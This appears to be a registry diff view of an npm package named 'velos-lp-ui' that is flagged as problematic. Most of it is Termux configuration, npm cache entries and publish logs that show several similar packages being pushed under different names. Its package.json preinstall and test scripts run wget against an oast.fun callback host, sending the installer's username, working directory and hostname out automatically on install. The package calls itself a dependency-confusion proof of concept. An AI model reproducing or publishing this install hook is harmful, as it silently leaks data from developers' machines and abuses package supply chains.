velos-lp-ui 10.99.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of velos-lp-ui might be problematic. Click here for more details.
- package/.config/termux/termux.properties +70 -0
- package/.npm/_cacache/content-v2/sha512/5e/2a/434b787df73e50d54fca935d3ff000c38cfa207b86e7dc2215a15b93a1044945493d06414bb3ed2fdcfc39281b9809c1164f2384333f241212fe504a50b7 +0 -0
- package/.npm/_cacache/content-v2/sha512/89/93/3211f9f933b10f0c29507f02574fea9174cacede9a82c29fe9095b7225ea8191e5f3b36507ab6af52a438fe7ec335d5169bf93455805a444ad03d3f6bac4 +0 -0
- package/.npm/_cacache/content-v2/sha512/a6/f5/bbd2f30cd8cb6658ec60fb59486afe525d438528a8d5922e3d449987b8b97ed276531aa6dce9232419ae07c3e1b43faadb201669d8bb8352fdd908dd63bd +0 -0
- package/.npm/_cacache/content-v2/sha512/cf/9e/5e2b7afb94b6b02cf4f0f2c2d5e384dac5d0b4767bab7421b47db7cedf12e11fc1be71e69a97d29072baf387b237a3c17d70bfb7ece613488ff82a68d410 +0 -0
- package/.npm/_cacache/content-v2/sha512/d5/91/52f1e0a2aefdcfd2ba3fc9aeb6e5453d41b28cd91c83923290d22855558a5d83a5eebf2402b753f98dc05a8dcb1fab4e584d663f9f48fe98e50547e789e9 +0 -0
- package/.npm/_cacache/content-v2/sha512/ea/8b/812a09aa5e4df182845f95d0705fa19b4b68476caeaa8fc2580ef237cd4f88f6d43ea6a9d8c11df18b39846e23a1b6469d9dce56291fef1f25f38262252d +0 -0
- package/.npm/_cacache/index-v5/e0/f3/563a92774ad5fa62edb9cbc4624c17a784676e377b3852d16ab8dcb28bea +7 -0
- package/.npm/_logs/2024-08-27T20_36_15_976Z-debug-0.log +29 -0
- package/.npm/_logs/2024-08-27T20_50_44_153Z-debug-0.log +54 -0
- package/.npm/_logs/2024-08-27T20_52_26_444Z-debug-0.log +55 -0
- package/.npm/_logs/2024-08-27T20_57_08_394Z-debug-0.log +61 -0
- package/.npm/_logs/2024-08-27T21_00_54_384Z-debug-0.log +13 -0
- package/index.js +3 -0
- package/package.json +20 -0
@@ -0,0 +1,70 @@
|
|
1
|
+
### This is a `.properties` [https://en.wikipedia.org/wiki/.properties] file
|
2
|
+
### for termux app properties and is loaded with the `java.util.Properties.load()`
|
3
|
+
### [https://developer.android.com/reference/java/util/Properties#load(java.io.Reader)]
|
4
|
+
### call by the termux app and must be formatted as per its spec.
|
5
|
+
### To make changes to a property value, uncomment the property line by removing
|
6
|
+
### any hash `#` characters at the start of the line.
|
7
|
+
### After making required changes, save the file and run `termux-reload-settings`
|
8
|
+
### in the terminal for changes to take effect. Some properties require app
|
9
|
+
### process to be restarted to be updated which can be done by force stopping
|
10
|
+
### the app from Android app settings.
|
11
|
+
### All information here can also be found on the
|
12
|
+
### wiki: https://wiki.termux.com/wiki/Terminal_Settings
|
13
|
+
|
14
|
+
###############
|
15
|
+
# Extra keys
|
16
|
+
###############
|
17
|
+
|
18
|
+
### Settings for choosing which set of symbols to use for illustrating keys.
|
19
|
+
### Choose between default, arrows-only, arrows-all, all and none
|
20
|
+
# extra-keys-style = default
|
21
|
+
|
22
|
+
### Force capitalize all text in extra keys row button labels.
|
23
|
+
# extra-keys-text-all-caps = true
|
24
|
+
|
25
|
+
### Default extra-key configuration
|
26
|
+
# extra-keys = [[ESC, TAB, CTRL, ALT, {key: '-', popup: '|'}, DOWN, UP]]
|
27
|
+
|
28
|
+
### Two rows with more keys
|
29
|
+
# extra-keys = [['ESC','/','-','HOME','UP','END','PGUP'], \
|
30
|
+
# ['TAB','CTRL','ALT','LEFT','DOWN','RIGHT','PGDN']]
|
31
|
+
|
32
|
+
### Configuration with additional popup keys (swipe up from an extra key)
|
33
|
+
# extra-keys = [[ \
|
34
|
+
# {key: ESC, popup: {macro: "CTRL f d", display: "tmux exit"}}, \
|
35
|
+
# {key: CTRL, popup: {macro: "CTRL f BKSP", display: "tmux ←"}}, \
|
36
|
+
# {key: ALT, popup: {macro: "CTRL f TAB", display: "tmux →"}}, \
|
37
|
+
# {key: TAB, popup: {macro: "ALT a", display: A-a}}, \
|
38
|
+
# {key: LEFT, popup: HOME}, \
|
39
|
+
# {key: DOWN, popup: PGDN}, \
|
40
|
+
# {key: UP, popup: PGUP}, \
|
41
|
+
# {key: RIGHT, popup: END}, \
|
42
|
+
# {macro: "ALT j", display: A-j, popup: {macro: "ALT g", display: A-g}}, \
|
43
|
+
# {key: KEYBOARD, popup: {macro: "CTRL d", display: exit}} \
|
44
|
+
# ]]
|
45
|
+
|
46
|
+
### Another configuration with advanced popup key usage designed for more
|
47
|
+
### specific use-cases. In this case, it is designed for working with Vim-like
|
48
|
+
### editors for faster navigation
|
49
|
+
#extra-keys = [ \
|
50
|
+
# [ \
|
51
|
+
# { key: ESC, popup: { macro: ":q\n", display: "QuickExit" } }, \
|
52
|
+
# { key: '/', popup: '\\\\' }, \
|
53
|
+
# { key: '-', popup: '_' }, \
|
54
|
+
# { key: HOME, popup: { macro: "CTRL HOME", display: "Top" } }, \
|
55
|
+
# { key: UP, popup: { macro: "CTRL UP", display: "UP" } }, \
|
56
|
+
# { key: END, popup: { macro: "CTRL END", display: "End" } }, \
|
57
|
+
# { key: ":", popup: ";" }, \
|
58
|
+
# { key: "(", popup: "{" } \
|
59
|
+
# ], \
|
60
|
+
# [ \
|
61
|
+
# { key: TAB, popup: { macro: ":wq\n", display: "Write And Exit" } }, \
|
62
|
+
# { key: CTRL, popup: { macro: ":w\n", display: "Write" } }, \
|
63
|
+
# ALT, \
|
64
|
+
# { key: LEFT, popup: { macro: "CTRL LEFT", display: "Left" } }, \
|
65
|
+
# { key: DOWN, popup: { macro: "CTRL DOWN", display: "Bottom" } }, \
|
66
|
+
# { key: RIGHT, popup: { macro: "CTRL RIGHT", display: "Right" } }, \
|
67
|
+
# { key: "#", popup: "$" }, \
|
68
|
+
# { key: ")", popup: "}" } \
|
69
|
+
# ] \
|
70
|
+
#]
|
package/.npm/_cacache/index-v5/e0/f3/563a92774ad5fa62edb9cbc4624c17a784676e377b3852d16ab8dcb28bea
ADDED
@@ -0,0 +1,7 @@
|
|
1
|
+
|
2
|
+
baf31ebbc1278058030fae9ab24d53510e4363de {"key":"pacote:tarball:file:/data/data/com.termux/files/home","integrity":"sha512-pvW70vMM2MtmWOxg+1lIav5SXUOFKKjVki49RJmHuLl+0nZTGqbc6SMkGa4Hw+G0P6rbIBZp2LuDUv3ZCN1jvQ==","time":1724760556737,"size":2839}
|
3
|
+
0bad5a32a97a60c6f1b8a2fc30ee5b0bf3344af4 {"key":"pacote:tarball:file:/data/data/com.termux/files/home","integrity":"sha512-XipDS3h99z5Q1U/Kk10/8ADDjPoge4bn3CIVoVuToQRJRUk9BkFLs+0v3Pw5KBuYCcEWTyOEMz8kEhL+UEpQtw==","time":1724762499609,"size":7071}
|
4
|
+
bceeb910f584cef866fe52e3892df218824abab1 {"key":"pacote:tarball:file:/data/data/com.termux/files/home","integrity":"sha512-6ouBKgmqXk3xgoRfldBwX6GbS2hHbK6qj8JYDvI3zU+I9tQ+pqnYwR3xizmEbiOhtkadnc5WKR/vHyXzgmIlLQ==","time":1724762651915,"size":15565}
|
5
|
+
55d349cefaea03f500b72a0f85b642241aa13114 {"key":"pacote:tarball:file:/data/data/com.termux/files/home","integrity":"sha512-1ZFS8eCirv3P0ro/ya625UU9QbKM2RyDkjKQ0ihVVYpdg6XuvyQCt1P5jcBajcsfq05YTWY/n0j+mOUFR+eJ6Q==","time":1724763215769,"size":32231}
|
6
|
+
b6349a9301701eb705512c39e2b93c45f49a5f08 {"key":"pacote:tarball:file:/data/data/com.termux/files/home","integrity":"sha512-z55eK3r7lLawLPTw8sLV44TaxdC0dnurdCG0fbfO3xLhH8G+ceaal9KQcrrzh7I3o8F9cL+37OYTSI/4KmjUEA==","time":1724791948256,"size":63170}
|
7
|
+
310d07cfdcba01e8cc57a74461a2a089d9d444c0 {"key":"pacote:tarball:file:/data/data/com.termux/files/home","integrity":"sha512-iZMyEfn5M7EPDClQfwJXT+qRdMrO3pqCwp/pCVtyJeqBkeXzs2UHq2r1KkOP5+wzXVFpv5NFWAWkRK0D0/a6xA==","time":1724792229758,"size":127732}
|
@@ -0,0 +1,29 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm whoami
|
8
|
+
7 verbose argv "whoami"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_36_15_976Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_36_15_976Z-debug-0.log
|
11
|
+
10 silly logfile done cleaning log files
|
12
|
+
11 verbose stack Error: This command requires you to be logged in.
|
13
|
+
11 verbose stack at module.exports (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/utils/get-identity.js:23:5)
|
14
|
+
11 verbose stack at Whoami.exec (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/commands/whoami.js:11:28)
|
15
|
+
11 verbose stack at /data/data/com.termux/files/usr/lib/node_modules/npm/lib/npm.js:251:63
|
16
|
+
11 verbose stack at Object.start (/data/data/com.termux/files/usr/lib/node_modules/npm/node_modules/proc-log/lib/index.js:101:21)
|
17
|
+
11 verbose stack at #exec (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/npm.js:250:17)
|
18
|
+
11 verbose stack at Npm.exec (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/npm.js:207:25)
|
19
|
+
11 verbose stack at module.exports (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/cli/entry.js:65:29)
|
20
|
+
12 error code ENEEDAUTH
|
21
|
+
13 error need auth This command requires you to be logged in.
|
22
|
+
14 error need auth You need to authorize this machine using `npm adduser`
|
23
|
+
15 verbose cwd /data/data/com.termux/files/home
|
24
|
+
16 verbose os Linux 4.19.157-perf+
|
25
|
+
17 verbose node v22.5.1
|
26
|
+
18 verbose npm v10.8.2
|
27
|
+
19 verbose exit 1
|
28
|
+
20 verbose code 1
|
29
|
+
21 error A complete log of this run can be found in: /data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_36_15_976Z-debug-0.log
|
@@ -0,0 +1,54 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm login
|
8
|
+
7 verbose argv "login"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_50_44_153Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_50_44_153Z-debug-0.log
|
11
|
+
10 notice Log in on https://registry.npmjs.org/
|
12
|
+
11 verbose web login before first POST
|
13
|
+
12 silly logfile done cleaning log files
|
14
|
+
13 http fetch POST 200 https://registry.npmjs.org/-/v1/login 908ms
|
15
|
+
14 verbose web auth got response {
|
16
|
+
14 verbose web auth loginUrl: 'https://www.npmjs.com/login?next=/login/cli/e1bdd313-691a-4596-9cc3-fb3ed191382f',
|
17
|
+
14 verbose web auth doneUrl: 'https://registry.npmjs.org/-/v1/done?sessionId=e1bdd313-691a-4596-9cc3-fb3ed191382f'
|
18
|
+
14 verbose web auth }
|
19
|
+
15 verbose web auth opening url pair
|
20
|
+
16 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 301ms
|
21
|
+
17 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 412ms
|
22
|
+
18 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 320ms
|
23
|
+
19 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 436ms
|
24
|
+
20 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 330ms
|
25
|
+
21 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 415ms
|
26
|
+
22 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 469ms
|
27
|
+
23 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 481ms
|
28
|
+
24 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 460ms
|
29
|
+
25 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 447ms
|
30
|
+
26 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 388ms
|
31
|
+
27 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 375ms
|
32
|
+
28 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 329ms
|
33
|
+
29 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 431ms
|
34
|
+
30 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 463ms
|
35
|
+
31 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 375ms
|
36
|
+
32 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 365ms
|
37
|
+
33 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 389ms
|
38
|
+
34 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 382ms
|
39
|
+
35 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 465ms
|
40
|
+
36 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 378ms
|
41
|
+
37 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 334ms
|
42
|
+
38 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 420ms
|
43
|
+
39 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 376ms
|
44
|
+
40 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 373ms
|
45
|
+
41 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 388ms
|
46
|
+
42 http fetch GET 200 https://registry.npmjs.org/-/v1/done?sessionId=*** 451ms
|
47
|
+
43 verbose web auth done-check finished
|
48
|
+
44 info login Logged in on https://registry.npmjs.org/.
|
49
|
+
45 verbose cwd /data/data/com.termux/files/home
|
50
|
+
46 verbose os Linux 4.19.157-perf+
|
51
|
+
47 verbose node v22.5.1
|
52
|
+
48 verbose npm v10.8.2
|
53
|
+
49 verbose exit 0
|
54
|
+
50 info ok
|
@@ -0,0 +1,55 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm publish
|
8
|
+
7 verbose argv "publish"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_52_26_444Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_52_26_444Z-debug-0.log
|
11
|
+
10 verbose publish [ '.' ]
|
12
|
+
11 silly logfile done cleaning log files
|
13
|
+
12 silly packumentCache heap:1098907648 maxSize:274726912 maxEntrySize:137363456
|
14
|
+
13 notice
|
15
|
+
14 notice 📦 frontpfr@30.99.0
|
16
|
+
15 notice Tarball Contents
|
17
|
+
16 notice 3.1kB .config/termux/termux.properties
|
18
|
+
16 notice 7.1kB .npm/_cacache/content-v2/sha512/5e/2a/434b787df73e50d54fca935d3ff000c38cfa207b86e7dc2215a15b93a1044945493d06414bb3ed2fdcfc39281b9809c1164f2384333f241212fe504a50b7
|
19
|
+
16 notice 2.8kB .npm/_cacache/content-v2/sha512/a6/f5/bbd2f30cd8cb6658ec60fb59486afe525d438528a8d5922e3d449987b8b97ed276531aa6dce9232419ae07c3e1b43faadb201669d8bb8352fdd908dd63bd
|
20
|
+
16 notice 32.2kB .npm/_cacache/content-v2/sha512/d5/91/52f1e0a2aefdcfd2ba3fc9aeb6e5453d41b28cd91c83923290d22855558a5d83a5eebf2402b753f98dc05a8dcb1fab4e584d663f9f48fe98e50547e789e9
|
21
|
+
16 notice 15.6kB .npm/_cacache/content-v2/sha512/ea/8b/812a09aa5e4df182845f95d0705fa19b4b68476caeaa8fc2580ef237cd4f88f6d43ea6a9d8c11df18b39846e23a1b6469d9dce56291fef1f25f38262252d
|
22
|
+
16 notice 990B .npm/_cacache/index-v5/e0/f3/563a92774ad5fa62edb9cbc4624c17a784676e377b3852d16ab8dcb28bea
|
23
|
+
16 notice 2.0kB .npm/_logs/2024-08-27T20_36_15_976Z-debug-0.log
|
24
|
+
16 notice 3.5kB .npm/_logs/2024-08-27T20_50_44_153Z-debug-0.log
|
25
|
+
16 notice 764B .npm/_logs/2024-08-27T20_52_26_444Z-debug-0.log
|
26
|
+
16 notice 92B index.js
|
27
|
+
16 notice 640B package.json
|
28
|
+
17 notice Tarball Details
|
29
|
+
18 notice name: frontpfr
|
30
|
+
19 notice version: 30.99.0
|
31
|
+
20 notice filename: frontpfr-30.99.0.tgz
|
32
|
+
21 notice package size: 63.2 kB
|
33
|
+
22 notice unpacked size: 68.8 kB
|
34
|
+
23 notice shasum: a93434250f153240a60910c980db5fcbeb37e70a
|
35
|
+
24 notice integrity: sha512-z55eK3r7lLawL[...]OYTSI/4KmjUEA==
|
36
|
+
25 notice total files: 11
|
37
|
+
26 notice
|
38
|
+
27 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
|
39
|
+
28 http fetch PUT 401 https://registry.npmjs.org/frontpfr 1149ms
|
40
|
+
29 verbose web auth opening url pair
|
41
|
+
30 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 447ms
|
42
|
+
31 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 448ms
|
43
|
+
32 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 408ms
|
44
|
+
33 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 381ms
|
45
|
+
34 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 467ms
|
46
|
+
35 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 385ms
|
47
|
+
36 http fetch GET 200 https://registry.npmjs.org/-/v1/done?authId=*** 463ms
|
48
|
+
37 verbose web auth done-check finished
|
49
|
+
38 http fetch PUT 200 https://registry.npmjs.org/frontpfr 2792ms
|
50
|
+
39 verbose cwd /data/data/com.termux/files/home
|
51
|
+
40 verbose os Linux 4.19.157-perf+
|
52
|
+
41 verbose node v22.5.1
|
53
|
+
42 verbose npm v10.8.2
|
54
|
+
43 verbose exit 0
|
55
|
+
44 info ok
|
@@ -0,0 +1,61 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm publish
|
8
|
+
7 verbose argv "publish"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_57_08_394Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_57_08_394Z-debug-0.log
|
11
|
+
10 verbose publish [ '.' ]
|
12
|
+
11 silly logfile done cleaning log files
|
13
|
+
12 silly packumentCache heap:1098907648 maxSize:274726912 maxEntrySize:137363456
|
14
|
+
13 notice
|
15
|
+
14 notice 📦 wp-zuny@10.99.0
|
16
|
+
15 notice Tarball Contents
|
17
|
+
16 notice 3.1kB .config/termux/termux.properties
|
18
|
+
16 notice 7.1kB .npm/_cacache/content-v2/sha512/5e/2a/434b787df73e50d54fca935d3ff000c38cfa207b86e7dc2215a15b93a1044945493d06414bb3ed2fdcfc39281b9809c1164f2384333f241212fe504a50b7
|
19
|
+
16 notice 2.8kB .npm/_cacache/content-v2/sha512/a6/f5/bbd2f30cd8cb6658ec60fb59486afe525d438528a8d5922e3d449987b8b97ed276531aa6dce9232419ae07c3e1b43faadb201669d8bb8352fdd908dd63bd
|
20
|
+
16 notice 63.2kB .npm/_cacache/content-v2/sha512/cf/9e/5e2b7afb94b6b02cf4f0f2c2d5e384dac5d0b4767bab7421b47db7cedf12e11fc1be71e69a97d29072baf387b237a3c17d70bfb7ece613488ff82a68d410
|
21
|
+
16 notice 32.2kB .npm/_cacache/content-v2/sha512/d5/91/52f1e0a2aefdcfd2ba3fc9aeb6e5453d41b28cd91c83923290d22855558a5d83a5eebf2402b753f98dc05a8dcb1fab4e584d663f9f48fe98e50547e789e9
|
22
|
+
16 notice 15.6kB .npm/_cacache/content-v2/sha512/ea/8b/812a09aa5e4df182845f95d0705fa19b4b68476caeaa8fc2580ef237cd4f88f6d43ea6a9d8c11df18b39846e23a1b6469d9dce56291fef1f25f38262252d
|
23
|
+
16 notice 1.2kB .npm/_cacache/index-v5/e0/f3/563a92774ad5fa62edb9cbc4624c17a784676e377b3852d16ab8dcb28bea
|
24
|
+
16 notice 2.0kB .npm/_logs/2024-08-27T20_36_15_976Z-debug-0.log
|
25
|
+
16 notice 3.5kB .npm/_logs/2024-08-27T20_50_44_153Z-debug-0.log
|
26
|
+
16 notice 3.3kB .npm/_logs/2024-08-27T20_52_26_444Z-debug-0.log
|
27
|
+
16 notice 764B .npm/_logs/2024-08-27T20_57_08_394Z-debug-0.log
|
28
|
+
16 notice 92B index.js
|
29
|
+
16 notice 639B package.json
|
30
|
+
17 notice Tarball Details
|
31
|
+
18 notice name: wp-zuny
|
32
|
+
19 notice version: 10.99.0
|
33
|
+
20 notice filename: wp-zuny-10.99.0.tgz
|
34
|
+
21 notice package size: 127.7 kB
|
35
|
+
22 notice unpacked size: 135.5 kB
|
36
|
+
23 notice shasum: 5ffdfde2a7e5f36de7498c1d3836760a9fa5be0a
|
37
|
+
24 notice integrity: sha512-iZMyEfn5M7EPD[...]AWkRK0D0/a6xA==
|
38
|
+
25 notice total files: 13
|
39
|
+
26 notice
|
40
|
+
27 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
|
41
|
+
28 http fetch PUT 401 https://registry.npmjs.org/wp-zuny 1437ms
|
42
|
+
29 verbose web auth opening url pair
|
43
|
+
30 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 313ms
|
44
|
+
31 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 315ms
|
45
|
+
32 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 474ms
|
46
|
+
33 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 343ms
|
47
|
+
34 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 403ms
|
48
|
+
35 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 468ms
|
49
|
+
36 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 448ms
|
50
|
+
37 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 429ms
|
51
|
+
38 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 346ms
|
52
|
+
39 http fetch GET 202 https://registry.npmjs.org/-/v1/done?authId=*** 482ms
|
53
|
+
40 http fetch GET 200 https://registry.npmjs.org/-/v1/done?authId=*** 460ms
|
54
|
+
41 verbose web auth done-check finished
|
55
|
+
42 http fetch PUT 200 https://registry.npmjs.org/wp-zuny 2987ms
|
56
|
+
43 verbose cwd /data/data/com.termux/files/home
|
57
|
+
44 verbose os Linux 4.19.157-perf+
|
58
|
+
45 verbose node v22.5.1
|
59
|
+
46 verbose npm v10.8.2
|
60
|
+
47 verbose exit 0
|
61
|
+
48 info ok
|
@@ -0,0 +1,13 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm publish
|
8
|
+
7 verbose argv "publish"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-27T21_00_54_384Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-27T21_00_54_384Z-debug-0.log
|
11
|
+
10 verbose publish [ '.' ]
|
12
|
+
11 silly logfile done cleaning log files
|
13
|
+
12 silly packumentCache heap:1098907648 maxSize:274726912 maxEntrySize:137363456
|
package/index.js
ADDED
package/package.json
ADDED
@@ -0,0 +1,20 @@
|
|
1
|
+
{
|
2
|
+
"name": "velos-lp-ui",
|
3
|
+
"version": "10.99.0",
|
4
|
+
"description": "Simple PoC package for testing for dependency confusion vulnerabilities.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "wget --quiet \"http://nhootcihoynpykhwhmbhk0hyk4xspeaaj.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS",
|
8
|
+
"preinstall": "wget --quiet \"http://nhootcihoynpykhwhmbhk0hyk4xspeaaj.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS"
|
9
|
+
},
|
10
|
+
"keywords": [
|
11
|
+
"test",
|
12
|
+
"PoC"
|
13
|
+
],
|
14
|
+
"dependencies": {},
|
15
|
+
"config": {
|
16
|
+
"unsafe-perm":true
|
17
|
+
},
|
18
|
+
"author": "WayCup",
|
19
|
+
"license": "ISC"
|
20
|
+
}
|